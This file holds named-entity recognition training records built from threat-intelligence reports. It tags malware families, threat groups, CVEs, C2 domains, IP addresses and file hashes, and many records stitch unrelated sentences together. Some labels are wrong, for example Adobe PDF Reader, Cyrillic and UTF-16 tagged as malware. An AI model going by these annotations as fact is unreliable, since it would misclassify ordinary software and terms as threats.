{"text": "We were a bit disappointed that we did not see traces of a true privilege escalation exploit after all this deobfuscation work , but it seems these FinFisher samples were designed to work just using UAC bypasses . APT35 typically targets military , diplomatic and government , media , energy , engineering , business services and telecommunications sectors in U.S. and the Middle East . After decoding the .png image , the loader then proceeds to initialize the key and IV used to perform AES decryption of the encrypted payload . This is expressed in the form of decimal digits .", "spans": {"VULNERABILITY: privilege escalation exploit": [[64, 92]], "MALWARE: FinFisher": [[148, 157]], "THREAT_ACTOR: APT35": [[214, 219]], "ORGANIZATION: military": [[238, 246]], "ORGANIZATION: diplomatic": [[249, 259]], "ORGANIZATION: government": [[264, 274]], "ORGANIZATION: media": [[277, 282]], "ORGANIZATION: energy": [[285, 291]], "ORGANIZATION: engineering": [[294, 305]], "ORGANIZATION: business services": [[308, 325]], "ORGANIZATION: telecommunications sectors": [[330, 356]]}, "info": {"id": "cyberner_stix_train_005907", "source": "cyberner_stix_train"}}
{"text": "Beyond the Android app itself , other components such as the aforementioned ELF libraries have additional data-stealing capabilities . FireEye malware analysis identified source code overlaps between malware used by APT41 in May 2016 targeting of a U.S.-based game development studio and the malware observed in supply chain compromises in 2017 and 2018 . Russian citizens—journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm .", "spans": {"SYSTEM: Android": [[11, 18]], "ORGANIZATION: FireEye": [[135, 142]], "THREAT_ACTOR: APT41": [[216, 221]], "ORGANIZATION: game development": [[260, 276]], "ORGANIZATION: citizens—journalists": [[364, 384]], "ORGANIZATION: software developers": [[387, 406]], "ORGANIZATION: politicians": [[409, 420]], "ORGANIZATION: researchers at universities": [[423, 450]], "ORGANIZATION: artists": [[457, 464]], "THREAT_ACTOR: Pawn Storm": [[486, 496]]}, "info": {"id": "cyberner_stix_train_005908", "source": "cyberner_stix_train"}}
{"text": "We were not able to find additional tools , but the attackers again compromised a legitimate Thai website to host their malware , in this case the student portal for a Thai University . CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data .", "spans": {"ORGANIZATION: CTU": [[186, 189]], "THREAT_ACTOR: TG-3390": [[241, 248]]}, "info": {"id": "cyberner_stix_train_005909", "source": "cyberner_stix_train"}}
{"text": "Cannon acknowledges the receipt of the secondary email address by sending an email to sahro.bella7@post.cz with s.txt ( contains {SysPar = 65} string ) as the attachment , ok within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": {"MALWARE: Cannon": [[0, 6]], "TOOL: email": [[49, 54], [77, 82]], "EMAIL: sahro.bella7@post.cz": [[86, 106]], "FILEPATH: s.txt": [[112, 117]]}, "info": {"id": "cyberner_stix_train_005910", "source": "cyberner_stix_train"}}
{"text": "] org Ties to previous activity The registrant of cdncool [ . Within hours of a user opening the malicious attachment dropping a HOMEUNIX backdoor , APT41 regained a foothold within the environment by installing PHOTO on the organization's servers across multiple geographic regions . We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit .", "spans": {"TOOL: HOMEUNIX backdoor": [[129, 146]], "THREAT_ACTOR: APT41": [[149, 154]], "TOOL: PHOTO": [[212, 217]], "VULNERABILITY: CVE-2013-0640": [[349, 362]], "MALWARE: MiniDuke": [[373, 381]], "VULNERABILITY: zero-day": [[435, 443]], "VULNERABILITY: exploit": [[484, 491]]}, "info": {"id": "cyberner_stix_train_005911", "source": "cyberner_stix_train"}}
{"text": "These additional IOCs will hopefully provide more context into the ongoing threat .", "spans": {"TOOL: IOCs": [[17, 21]]}, "info": {"id": "cyberner_stix_train_005912", "source": "cyberner_stix_train"}}
{"text": "SEND_SMS - Allows the application to send SMS messages . PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . Unit 42 researchers have been tracking Gorgon Group for criminal and targeted attacks .", "spans": {"MALWARE: PICKPOCKET": [[57, 67]], "ORGANIZATION: Unit 42": [[201, 208]], "THREAT_ACTOR: Gorgon Group": [[240, 252]]}, "info": {"id": "cyberner_stix_train_005913", "source": "cyberner_stix_train"}}
{"text": "These HTTP requests match known patterns for a banking Trojan named Chthonic , which is a variant of Zeus .", "spans": {"MALWARE: banking Trojan": [[47, 61]], "MALWARE: Chthonic": [[68, 76]]}, "info": {"id": "cyberner_stix_train_005914", "source": "cyberner_stix_train"}}
{"text": "FakeSpy is able to check the network connectivity status by using the function isNetworkAvailable . FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015 . The attackers have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: FIN7": [[100, 104]], "THREAT_ACTOR: attackers": [[234, 243]], "ORGANIZATION: aerospace": [[328, 337]], "ORGANIZATION: energy": [[340, 346]], "ORGANIZATION: government": [[349, 359]], "ORGANIZATION: high-tech": [[362, 371]], "ORGANIZATION: consulting services": [[374, 393]], "ORGANIZATION: chemicals": [[400, 409]], "ORGANIZATION: manufacturing": [[412, 425]], "ORGANIZATION: mining sectors": [[428, 442]]}, "info": {"id": "cyberner_stix_train_005915", "source": "cyberner_stix_train"}}
{"text": "Below screen shot shows the posts made by the user , the hits column in the below screen shot gives an idea of number of times the links were visited ( probably by the malicious macro code ) , this can give rough idea of the number of users who are probably infected as a result of opening the malicious document .", "spans": {"TOOL: malicious macro code": [[168, 188]]}, "info": {"id": "cyberner_stix_train_005916", "source": "cyberner_stix_train"}}
{"text": "In some samples deployed since March 2019 , Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface (AMSI) . In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"THREAT_ACTOR: Turla": [[44, 49]], "MALWARE: NetTraveler": [[192, 203]], "VULNERABILITY: exploit": [[217, 224]], "VULNERABILITY: CVE-2012-0158": [[225, 238]], "MALWARE: NetTraveler Trojan": [[254, 272]]}, "info": {"id": "cyberner_stix_train_005917", "source": "cyberner_stix_train"}}
{"text": "For more detailed information about the threat , check out the blog post from CSIS . Gallmaker may well have continued to avoid detection were it not for Symantec 's technology . . Lastly , we emphasize that although the samples of COSMICENERGY we obtained are potentially red team related , threat actors regularly leverage contractors and red team tools in real world threat activity , including during OT attacks .", "spans": {"ORGANIZATION: CSIS": [[78, 82]], "THREAT_ACTOR: Gallmaker": [[85, 94]], "ORGANIZATION: Symantec": [[154, 162]], "MALWARE: COSMICENERGY": [[232, 244]], "THREAT_ACTOR: threat actors": [[292, 305]], "TOOL: red team tools": [[341, 355]]}, "info": {"id": "cyberner_stix_train_005918", "source": "cyberner_stix_train"}}
{"text": "The following is the code routine for video capturing . We have previously observed the admin@338 group use BUBBLEWRAP . Upon deeper investigation into the installed Helminth fileless agent , we identified a near perfect match to the OilRig campaign executed by an Iranian hacker group against 140 financial institutions in the Middle East last year , as analyzed by FireEye , Palo Alto Networks and Logrhythm . In late 2022 , Mandiant responded to a disruptive cyber physical incident in which the Russia - linked threat actor Sandworm targeted a Ukrainian critical infrastructure organization .", "spans": {"THREAT_ACTOR: admin@338 group": [[88, 103]], "TOOL: BUBBLEWRAP": [[108, 118]], "MALWARE: Helminth": [[166, 174]], "MALWARE: OilRig": [[234, 240]], "ORGANIZATION: FireEye": [[367, 374]], "ORGANIZATION: Palo Alto Networks": [[377, 395]], "ORGANIZATION: Logrhythm": [[400, 409]], "ORGANIZATION: Mandiant": [[427, 435]], "THREAT_ACTOR: disruptive cyber physical incident": [[451, 485]], "THREAT_ACTOR: Sandworm": [[528, 536]], "ORGANIZATION: Ukrainian critical infrastructure organization": [[548, 594]]}, "info": {"id": "cyberner_stix_train_005919", "source": "cyberner_stix_train"}}
{"text": "These VNC exectuables would either be included in the SFX file or downloaded by the batch script . To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control .", "spans": {"TOOL: VNC": [[6, 9]], "FILEPATH: SWAnalytics": [[149, 160]]}, "info": {"id": "cyberner_stix_train_005920", "source": "cyberner_stix_train"}}
{"text": "Stage 6 : The payload is a modular spyware framework for further analysis Our journey to deobfuscating FinFisher has allowed us to uncover the complex anti-analysis techniques used by this malware , as well as to use this intel to protect our customers , which is our top priority . It was a decoy to make visitor download a \" Flash Player \" , which was in fact DownPaper malware , analyzed later in this report . The launcher then calls the backdoor DLL’s entry point . Mandiant assesses that DPRK ’s", "spans": {"MALWARE: FinFisher": [[103, 112]], "TOOL: DownPaper malware": [[362, 379]], "ORGANIZATION: Mandiant": [[471, 479]]}, "info": {"id": "cyberner_stix_train_005921", "source": "cyberner_stix_train"}}
{"text": "From the sample we analyzed , attacks started from one virtual private server ( VPS ) that searches for a vulnerable machine to compromise ( previous techniques used malicious URLs or infecting legitimate websites for bot propagation ) .", "spans": {"TOOL: virtual private server": [[55, 77]], "TOOL: VPS": [[80, 83]]}, "info": {"id": "cyberner_stix_train_005922", "source": "cyberner_stix_train"}}
{"text": ". The most recent NewsBeef campaign uses this toolset in conjunction with spearphishing emails , links sent over social media/standalone private messaging applications , and watering hole attacks that leverage compromised high-profile websites some belonging to the SA government . Molerats : Operation Molerats , Gaza Cybergang .", "spans": {"THREAT_ACTOR: NewsBeef": [[18, 26]], "THREAT_ACTOR: Molerats": [[282, 290]], "THREAT_ACTOR: Operation Molerats": [[293, 311]], "THREAT_ACTOR: Gaza Cybergang": [[314, 328]]}, "info": {"id": "cyberner_stix_train_005923", "source": "cyberner_stix_train"}}
{"text": "Rather than rooting devices , the latest variant includes new virtual machine techniques that allow the malware to perform ad fraud better than ever , company researchers said in a blog post published Monday . In terms of form factor , PapaAlfa comes in two flavors : service DLL and standalone executable . However , Symantec has found no further evidence to suggest Elfin was responsible for these Shamoon attacks to date . Mandiant identified novel operational technology ( OT ) / industrial control system ( ICS)-oriented malware , which we track as COSMICENERGY , uploaded to a public malware scanning utility in December 2021 by a submitter in Russia .", "spans": {"TOOL: PapaAlfa": [[236, 244]], "TOOL: service DLL": [[268, 279]], "TOOL: standalone executable": [[284, 305]], "ORGANIZATION: Symantec": [[318, 326]], "THREAT_ACTOR: Elfin": [[368, 373]], "THREAT_ACTOR: Shamoon": [[400, 407]], "ORGANIZATION: Mandiant": [[426, 434]], "MALWARE: novel operational technology ( OT ) / industrial control system ( ICS)-oriented malware": [[446, 533]], "MALWARE: COSMICENERGY": [[554, 566]], "TOOL: public malware scanning utility": [[583, 614]]}, "info": {"id": "cyberner_stix_train_005924", "source": "cyberner_stix_train"}}
{"text": "It follows Stuxnet which was used against Iran in 2010 and Industroyer which we believe was deployed by Sandworm Team against Ukraine in 2016 . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) .", "spans": {"THREAT_ACTOR: Sandworm": [[104, 112]], "THREAT_ACTOR: Ke3chang": [[144, 152]], "TOOL: Java": [[174, 178]], "VULNERABILITY: zero-day": [[179, 187]], "VULNERABILITY: CVE-2012-4681": [[204, 217]], "FILEPATH: Microsoft Word": [[263, 277]], "VULNERABILITY: CVE-2010-3333": [[280, 293]], "MALWARE: Adobe PDF Reader": [[300, 316]], "VULNERABILITY: CVE-2010-2883": [[319, 332]]}, "info": {"id": "cyberner_stix_train_005925", "source": "cyberner_stix_train"}}
{"text": "] infodavos-seaworth [ . Until the publication of the Palo Alto report , the developers of the Infy appeared to be actively updating and maintaining the codebase , and new releases were distributed to existing , as well as new , targets quite regularly . The FQDNs “ ug-co.hugesoft.org ” and “ 7cback.hugesoft.org ” are part of the “ hugesoft.org ” zone and are called “ subdomains ” of the zone . Monitor for contextual data about a file , which may include information such as name , the content ( ex : signature , headers , or data / media ) , user / ower , permissions that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: Palo Alto": [[54, 63]], "TOOL: Infy": [[95, 99]], "TOOL: FQDNs": [[259, 264]], "DOMAIN: ug-co.hugesoft.org": [[267, 285]], "DOMAIN: 7cback.hugesoft.org": [[294, 313]], "DOMAIN: hugesoft.org": [[334, 346]]}, "info": {"id": "cyberner_stix_train_005926", "source": "cyberner_stix_train"}}
{"text": "X-Force IRIS File name : cv_itworx.doc .", "spans": {"FILEPATH: cv_itworx.doc": [[25, 38]]}, "info": {"id": "cyberner_stix_train_005927", "source": "cyberner_stix_train"}}
{"text": "The VPN package is no longer present , further reinforcing our conclusion that it was not in use . It's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . Both the THREEBYTE and HIGHTIDE backdoors were used in attacks targeting organizations in Taiwan ; Hybrid Identity APT29 has edited the Microsoft.IdentityServer.Servicehost.exe.config file to load a malicious DLL into the AD FS process , thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name .", "spans": {"TOOL: DNS-based attack technique": [[125, 151]], "ORGANIZATION: Arbor 's ASERT Team": [[282, 301]], "MALWARE: THREEBYTE": [[347, 356]], "MALWARE: HIGHTIDE backdoors": [[361, 379]], "THREAT_ACTOR: Hybrid Identity APT29": [[437, 458]]}, "info": {"id": "cyberner_stix_train_005928", "source": "cyberner_stix_train"}}
{"text": "CrowdStrike Services Inc. , our Incident Response group , was called by the Democratic National Committee ( DNC ) , the formal governing body for the US Democratic Party , to respond to a suspected breach .", "spans": {"ORGANIZATION: CrowdStrike": [[0, 11]], "ORGANIZATION: Incident Response": [[32, 49]], "ORGANIZATION: Democratic National Committee": [[76, 105]], "ORGANIZATION: DNC": [[108, 111]]}, "info": {"id": "cyberner_stix_train_005929", "source": "cyberner_stix_train"}}
{"text": "Figure 9 . We have not yet identified FIN7’s ultimate goal in this campaign , as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft . Hilename: C:\\Windows\\svchost.exe .", "spans": {"THREAT_ACTOR: FIN7’s": [[38, 44]], "MALWARE: malicious emails": [[124, 140]], "FILEPATH: C:\\Windows\\svchost.exe": [[281, 303]]}, "info": {"id": "cyberner_stix_train_005930", "source": "cyberner_stix_train"}}
{"text": "The malware was first spotted by Tatyana Shishkova from Kaspersky by end October 2019 , but actually dates back to June 2019 . CIA hackers discussed what the NSA's Equation Group hackers did wrong and how the CIA's malware makers could avoid similar exposure . A similar group emerged in 2015 and was identified by Symantec as Dragonfly 2.0 .", "spans": {"ORGANIZATION: Kaspersky": [[56, 65]], "ORGANIZATION: CIA": [[127, 130]], "THREAT_ACTOR: Equation Group": [[164, 178]], "ORGANIZATION: Symantec": [[315, 323]], "THREAT_ACTOR: Dragonfly 2.0": [[327, 340]]}, "info": {"id": "cyberner_stix_train_005931", "source": "cyberner_stix_train"}}
{"text": "It runs in an infinite loop , in each iteration it requests a command from the C2 , and then it sleeps for a time period it receives in the C2 response ( defaulting to 1 second if no sleep-time sent ) .", "spans": {"TOOL: C2": [[79, 81], [140, 142]]}, "info": {"id": "cyberner_stix_train_005932", "source": "cyberner_stix_train"}}
{"text": "The LUNAR SPIDER threat group is the Eastern European-based operator and developer of the commodity banking malware called BokBot ( aka IcedID ) , which was first observed in April 2017 . Financially motivated APT groups which focus efforts on targeted attacks on the financial sector such as — Anunak , Corkow , Buhtrap — usually managed botnets using developed or modified banking Trojans .", "spans": {"THREAT_ACTOR: LUNAR SPIDER threat group": [[4, 29]], "TOOL: BokBot": [[123, 129]], "TOOL: IcedID": [[136, 142]], "ORGANIZATION: financial sector": [[268, 284]], "MALWARE: Corkow": [[304, 310]], "ORGANIZATION: banking": [[375, 382]]}, "info": {"id": "cyberner_stix_train_005933", "source": "cyberner_stix_train"}}
{"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . If it's Cyrillic and the command to the shell is not ‘ipconfig’ , the threat converts the command result text encoding from Cyrillic to UTF-16 .", "spans": {"MALWARE: malware": [[4, 11]], "TOOL: CMD/PowerShell": [[40, 54]], "THREAT_ACTOR: attackers": [[72, 81]], "FILEPATH: it's": [[173, 177]], "MALWARE: Cyrillic": [[178, 186]], "MALWARE: UTF-16": [[306, 312]]}, "info": {"id": "cyberner_stix_train_005934", "source": "cyberner_stix_train"}}
{"text": "This suggests that this certificate might have been previously used for a similar attack against the Ukrainian Ministry of Foreign Affairs , or associated targets , although there is no documentation of such attack available to the public .", "spans": {"ORGANIZATION: Ukrainian Ministry of Foreign Affairs": [[101, 138]]}, "info": {"id": "cyberner_stix_train_005935", "source": "cyberner_stix_train"}}
{"text": "Pitty Tiger group is sometimes using stolen material as spear phishing content to target other persons . registrant information points to activity possibly as early as 2011 .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[0, 17]]}, "info": {"id": "cyberner_stix_train_005936", "source": "cyberner_stix_train"}}
{"text": "TG-3390 : api.apigmail.com .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "DOMAIN: api.apigmail.com": [[10, 26]]}, "info": {"id": "cyberner_stix_train_005937", "source": "cyberner_stix_train"}}
{"text": "How these recorded calls are sent to the command and control server ( CnC ) is taken care of by MainService , which is discussed next . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . Gamaredon Group is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government .", "spans": {"THREAT_ACTOR: Shadow Brokers": [[190, 204]], "THREAT_ACTOR: Equation": [[266, 274]], "THREAT_ACTOR: Gamaredon": [[283, 292]], "ORGANIZATION: Ukrainian government": [[410, 430]]}, "info": {"id": "cyberner_stix_train_005938", "source": "cyberner_stix_train"}}
{"text": "Attitude Change The disinterest in the issues appears to have changed with The New York Times report , which lit a fire underneath Adups and BLU . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . C2 : blog.softfix.co.kr .", "spans": {"ORGANIZATION: New York Times": [[79, 93]], "ORGANIZATION: Adups": [[131, 136]], "ORGANIZATION: BLU": [[141, 144]], "THREAT_ACTOR: threat groups": [[184, 197]], "VULNERABILITY: CVE-2018-0798": [[250, 263]], "TOOL: C2": [[365, 367]], "DOMAIN: blog.softfix.co.kr": [[370, 388]]}, "info": {"id": "cyberner_stix_train_005939", "source": "cyberner_stix_train"}}
{"text": "In doing so , the Trojan can be sure that its malicious module will be executed with system rights . Recently , Trend Micro researchers came across a new mobile malware family which we have called GnatSpy . RevengeHotels : df632e25c32e8f8ad75ed3c50dd1cd47 . Once the system is exploited , a very small downloader is dropped onto the victim - s disc that - s only 20 KB in size .", "spans": {"ORGANIZATION: Trend Micro": [[112, 123]], "TOOL: GnatSpy": [[197, 204]], "THREAT_ACTOR: RevengeHotels": [[207, 220]], "FILEPATH: df632e25c32e8f8ad75ed3c50dd1cd47": [[223, 255]]}, "info": {"id": "cyberner_stix_train_005940", "source": "cyberner_stix_train"}}
{"text": "The Check Point researchers have dubbed the malware family \" HummingBad , '' but researchers from mobile security company Lookout say HummingBad is in fact Shedun , a family of auto-rooting malware that came to light last November and had already infected a large number of devices . RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders . APT33 : 217.13.103.46 securityupdated.com . By comparison , the INDUSTROYER.V2 incidents lacked many of those same disruptive components and the malware did not feature the wiper module from the original INDUSTROYER .", "spans": {"ORGANIZATION: Check Point": [[4, 15]], "MALWARE: HummingBad": [[61, 71], [134, 144]], "ORGANIZATION: Lookout": [[122, 129]], "MALWARE: Shedun": [[156, 162]], "TOOL: RATANKBA": [[284, 292]], "TOOL: Microsoft Office documents": [[367, 393]], "TOOL: CHM files": [[406, 415]], "THREAT_ACTOR: APT33": [[453, 458]], "IP_ADDRESS: 217.13.103.46": [[461, 474]], "DOMAIN: securityupdated.com": [[475, 494]], "MALWARE: INDUSTROYER.V2": [[517, 531]], "MALWARE: malware": [[598, 605]], "MALWARE: INDUSTROYER": [[657, 668]]}, "info": {"id": "cyberner_stix_train_005941", "source": "cyberner_stix_train"}}
{"text": "This information is requested within a few minutes of initial compromise and the amount of data the operator will have to deal with is quite considerable .", "spans": {}, "info": {"id": "cyberner_stix_train_005942", "source": "cyberner_stix_train"}}
{"text": "RuMMS can upload responses to the balance inquiries ( received via SMS message ) to the remote C2 server , which can send back additional commands to be sent from the victim to the provider ’ s payment service . We first discovered this group in mid-2016 , although it is possible their operations extends earlier than that time frame . It is not the first time an attacker used only cloud providers . Since 2021 , there have been multiple leaks of ransomware source code and builders components that are essential to creating and modifying ransomware .", "spans": {"MALWARE: RuMMS": [[0, 5]], "THREAT_ACTOR: group": [[237, 242]], "TOOL: cloud providers": [[384, 399]], "VULNERABILITY: multiple leaks of ransomware source code": [[431, 471]]}, "info": {"id": "cyberner_stix_train_005943", "source": "cyberner_stix_train"}}
{"text": "LATENTBOT is a modular and highly obfuscated type of malware first discovered by FireEye iSIGHT intelligence in December 2015 . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": {"TOOL: LATENTBOT": [[0, 9]], "ORGANIZATION: FireEye iSIGHT intelligence": [[81, 108]], "ORGANIZATION: security firm": [[145, 158]], "ORGANIZATION: military officials": [[191, 209]], "TOOL: emails": [[229, 235]], "TOOL: Adobe Reader": [[281, 293]], "VULNERABILITY: vulnerability": [[294, 307]]}, "info": {"id": "cyberner_stix_train_005944", "source": "cyberner_stix_train"}}
{"text": "It then calls a routine that adds a code section to a target module . The survey contained macros that , once enabled , downloaded PupyRAT . Side-loaded DLL Anti-debugging/anti-sandboxing check for parent process name . Why does this matter Because nation states are well funded and super determined .", "spans": {"TOOL: PupyRAT": [[131, 138]], "TOOL: DLL": [[153, 156]], "ORGANIZATION: nation states": [[249, 262]]}, "info": {"id": "cyberner_stix_train_005945", "source": "cyberner_stix_train"}}
{"text": "Another is a loader variant seen during the spring of 2010 in conjunction with both CosmicDuke and PinchDuke .", "spans": {"TOOL: loader": [[13, 19]], "MALWARE: CosmicDuke": [[84, 94]], "MALWARE: PinchDuke": [[99, 108]]}, "info": {"id": "cyberner_stix_train_005946", "source": "cyberner_stix_train"}}
{"text": "Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails . The Callisto Group has been active at least since late 2015 and continues to be so , including continuing to set up new phishing infrastructure every week .", "spans": {"THREAT_ACTOR: APT37": [[52, 57]]}, "info": {"id": "cyberner_stix_train_005947", "source": "cyberner_stix_train"}}
{"text": "We don't know the exact date Suckfly stole the certificates from the South Korean organizations .", "spans": {"THREAT_ACTOR: Suckfly": [[29, 36]]}, "info": {"id": "cyberner_stix_train_005948", "source": "cyberner_stix_train"}}
{"text": "The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . Lookout researchers have discovered a new mobile surveillanceware family , FrozenCell .", "spans": {"TOOL: Equation Editor": [[36, 51]], "MALWARE: EQNEDT32.EXE": [[54, 66]], "ORGANIZATION: Lookout": [[163, 170]], "MALWARE: FrozenCell": [[238, 248]]}, "info": {"id": "cyberner_stix_train_005949", "source": "cyberner_stix_train"}}
{"text": "Broadcast receivers are components that allow you to register for various Android events . The 2017 leak of Equation Group tools by a mysterious group calling itself the Shadow Brokers was one of the most significant cyber security stories in recent years . Utilizing a passive listener as a communications channel is characteristic of the Winnti developers ’ foresight in needing a failsafe secondary command-and-control mechanisms .", "spans": {"SYSTEM: Android": [[74, 81]], "THREAT_ACTOR: mysterious group": [[134, 150]], "MALWARE: Winnti": [[340, 346]]}, "info": {"id": "cyberner_stix_train_005950", "source": "cyberner_stix_train"}}
{"text": "The Zebrocy chain follows a pattern : spearphish attachment -> compiled Autoit script ( downloader ) -> Zebrocy payload .", "spans": {"MALWARE: Zebrocy": [[4, 11], [104, 111]], "TOOL: Autoit": [[72, 78]]}, "info": {"id": "cyberner_stix_train_005951", "source": "cyberner_stix_train"}}
{"text": "We have detected several malicious programs using GCM for command and control – the widespread Trojan-SMS.AndroidOS.FakeInst.a , Trojan-SMS.AndroidOS.Agent.ao , and Trojan-SMS.AndroidOS.OpFake.a among others . The group had also targeted three different telecoms operators , all based in Southeast Asia . The string pool is never stored entirely decrypted in memory ; the field of interest is decrypted when needed and then immediately freed ( thus quickly unavailable ) . Mandiant observed the threat actor use e.exe to load d.dll into lsass process memory .", "spans": {"SYSTEM: GCM": [[50, 53]], "MALWARE: Trojan-SMS.AndroidOS.FakeInst.a": [[95, 126]], "MALWARE: Trojan-SMS.AndroidOS.Agent.ao": [[129, 158]], "MALWARE: Trojan-SMS.AndroidOS.OpFake.a": [[165, 194]], "ORGANIZATION: telecoms operators": [[254, 272]]}, "info": {"id": "cyberner_stix_train_005952", "source": "cyberner_stix_train"}}
{"text": "Gooligan is a new variant of the Android malware campaign found by our researchers in the SnapPea app last year . We do not have evidence that the earliest targeted financial institutions were victimized by fraudulent transactions before APT38 left the compromised environments , possibly indicating that APT38 was conducting reconnaissance-only activity at that time . . It also reveals direct links to secure[.]66[.]to and zhu[.]vn , both of which also belong to Hack520 and contains his personal blog .", "spans": {"MALWARE: Gooligan": [[0, 8]], "MALWARE: SnapPea": [[90, 97]], "ORGANIZATION: financial institutions": [[165, 187]], "THREAT_ACTOR: APT38": [[238, 243], [305, 310]], "THREAT_ACTOR: Hack520": [[465, 472]]}, "info": {"id": "cyberner_stix_train_005953", "source": "cyberner_stix_train"}}
{"text": "While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well . First , Turla steals emails by forwarding all outgoing emails to the attackers .", "spans": {"THREAT_ACTOR: actor": [[22, 27]], "VULNERABILITY: CVE-2012-0158": [[67, 80]], "THREAT_ACTOR: Spring Dragon": [[104, 117]], "THREAT_ACTOR: Turla": [[190, 195]], "TOOL: emails": [[203, 209], [237, 243]]}, "info": {"id": "cyberner_stix_train_005954", "source": "cyberner_stix_train"}}
{"text": "However , given the way the trojan is built , it is highly customizable , meaning that adapting it to a different language would be extremely easy . Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions and financial systems to raise money for the North Korean regime .", "spans": {"TOOL: maldoc": [[189, 195]], "ORGANIZATION: ICS": [[220, 223]], "ORGANIZATION: OT staff": [[227, 235]], "THREAT_ACTOR: LYCEUM": [[238, 244]], "THREAT_ACTOR: APT38": [[364, 369]], "ORGANIZATION: financial institutions": [[405, 427]]}, "info": {"id": "cyberner_stix_train_005955", "source": "cyberner_stix_train"}}
{"text": "PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach . The attackers behind observed activity in 2018 operate from the Xicheng District of Beijing via the net block 221.216.0.0/13 .", "spans": {"VULNERABILITY: Flash vulnerability": [[108, 127]], "VULNERABILITY: CVE-2015-5119": [[130, 143]]}, "info": {"id": "cyberner_stix_train_005956", "source": "cyberner_stix_train"}}
{"text": "For every disk it creates a “ stash ” directory in “ %root stash directory location%\\%volume serial number in hex% ” with attributes FILE_ATTRIBUTE_HIDDEN and FILE_ATTRIBUTE_SYSTEM .", "spans": {}, "info": {"id": "cyberner_stix_train_005957", "source": "cyberner_stix_train"}}
{"text": "The RAT stores all the data in a database ( DB ) in order to send it to the Command & Control ( C & C ) server . The group targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . 13.doc : a9bbbf5e4797d90d579b2cf6f9d61443dff82ead9d9ffd10f3c31b686ccf81ab . We mentioned Akamai 's blog but it was also documented by Recorded Future .", "spans": {"THREAT_ACTOR: group": [[117, 122]], "ORGANIZATION: media": [[143, 148]], "THREAT_ACTOR: admin@338": [[167, 176]], "TOOL: remote access Trojans": [[234, 255]], "TOOL: Poison Ivy": [[264, 274]], "ORGANIZATION: government": [[285, 295]], "ORGANIZATION: financial firms": [[300, 315]], "ORGANIZATION: global economic": [[332, 347]], "FILEPATH: 13.doc": [[357, 363]], "FILEPATH: a9bbbf5e4797d90d579b2cf6f9d61443dff82ead9d9ffd10f3c31b686ccf81ab": [[366, 430]], "ORGANIZATION: Akamai 's": [[446, 455]], "ORGANIZATION: Recorded Future": [[491, 506]]}, "info": {"id": "cyberner_stix_train_005958", "source": "cyberner_stix_train"}}
{"text": "The shellcode performs a DWORD XOR of 4 bytes at an offset from the beginning of the shellcode that changes the code to create a loop so the XOR continues 0x57 times .", "spans": {}, "info": {"id": "cyberner_stix_train_005959", "source": "cyberner_stix_train"}}
{"text": "They include the director of speechwriting for Hillary for America and the deputy director office of the chair at the DNC .", "spans": {"ORGANIZATION: DNC": [[118, 121]]}, "info": {"id": "cyberner_stix_train_005960", "source": "cyberner_stix_train"}}
{"text": "Trend Micro™ Mobile Security for Enterprise provides device , compliance and application management , data protection , and configuration provisioning , as well as protects devices from attacks that exploit vulnerabilities , preventing unauthorized access to apps , and detecting and blocking malware and fraudulent websites . The new threat actor group was eventually named Silence . This activity cluster , which Kaspersky Lab has followed for a few years , uses various implants for targeting mainly banks , and developers of banking and money processing software solutions . for third - party application logging , messaging , and/or other artifacts that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: Trend Micro™": [[0, 12]], "SYSTEM: Mobile Security for Enterprise": [[13, 43]]}, "info": {"id": "cyberner_stix_train_005961", "source": "cyberner_stix_train"}}
{"text": "Both malware kill all current browsers before installing fake certificates :", "spans": {}, "info": {"id": "cyberner_stix_train_005962", "source": "cyberner_stix_train"}}
